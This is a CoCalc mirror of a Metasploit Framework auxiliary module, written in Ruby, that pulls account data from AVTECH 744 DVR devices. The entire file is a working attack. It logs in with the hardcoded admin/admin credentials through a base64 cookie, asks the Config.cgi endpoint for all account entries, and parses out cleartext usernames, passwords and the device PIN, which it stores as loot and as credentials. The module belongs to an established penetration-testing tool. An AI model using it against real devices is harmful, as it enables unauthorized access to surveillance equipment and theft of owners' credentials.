Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/avtech744_dvr_accounts.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'AVTECH 744 DVR Account Information Retrieval',

15
        'Description' => %q{

16
          This module will extract the account information from the AVTECH 744 DVR devices,

17
          including usernames, cleartext passwords, and the device PIN, along with

18
          a few other miscellaneous details. In order to extract the information, hardcoded

19
          credentials admin/admin are used. These credentials can't be changed from the device

20
          console UI nor from the web UI.

21
        },

22
        'Author' => [ 'nstarke' ],

23
        'License' => MSF_LICENSE,

24
        'Notes' => {

25
          'Reliability' => UNKNOWN_RELIABILITY,

26
          'Stability' => UNKNOWN_STABILITY,

27
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

28
        }

29
      )

30
    )

31
  end

32


33
  def run

34
    res = send_request_cgi({

35
      'method' => 'POST',

36
      'uri' => '/cgi-bin/user/Config.cgi',

37
      'cookie' => "SSID=#{Rex::Text.encode_base64('admin:admin')};",

38
      'vars_post' => {

39
        'action' => 'get',

40
        'category' => 'Account.*'

41
      }

42
    })

43


44
    unless res

45
      fail_with(Failure::Unreachable, 'No response received from the target')

46
    end

47


48
    unless res.code == 200

49
      fail_with(Failure::Unknown, 'An unknown error occurred')

50
    end

51


52
    raw_collection = extract_data(res.body)

53
    extract_creds(raw_collection)

54


55
    p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)

56
    print_good("avtech744.dvr.accounts stored in #{p}")

57
  end

58


59
  def extract_data(body)

60
    raw_collection = []

61
    body.each_line do |line|

62
      key, value = line.split('=')

63
      if key && value

64
        _, second, third = key.split('.')

65
        if third

66
          index = second.slice(second.length - 1).to_i

67
          raw_collection[index] = raw_collection[index] ||= {}

68
          case third

69
          when 'Username'

70
            raw_collection[index][:username] = value.strip!

71
          when 'Password'

72
            raw_collection[index][:password] = value.strip!

73
          end

74
        elsif second.include?('Password')

75
          print_good("PIN Retrieved: #{key} - #{value.strip!}")

76
        end

77
      end

78
    end

79


80
    raw_collection

81
  end

82


83
  def extract_creds(raw_collection)

84
    raw_collection.each do |raw|

85
      unless raw

86
        next

87
      end

88


89
      service_data = {

90
        address: rhost,

91
        port: rport,

92
        service_name: 'http',

93
        protocol: 'tcp',

94
        workspace_id: myworkspace_id

95
      }

96


97
      credential_data = {

98
        module_fullname: self.fullname,

99
        origin_type: :service,

100
        private_data: raw[:password],

101
        private_type: :password,

102
        username: raw[:username]

103
      }

104


105
      credential_data.merge!(service_data)

106


107
      credential_core = create_credential(credential_data)

108


109
      login_data = {

110
        core: credential_core,

111
        status: Metasploit::Model::Login::Status::UNTRIED

112
      }

113


114
      login_data.merge!(service_data)

115


116
      create_credential_login(login_data)

117
    end

118
  end

119
end

120


121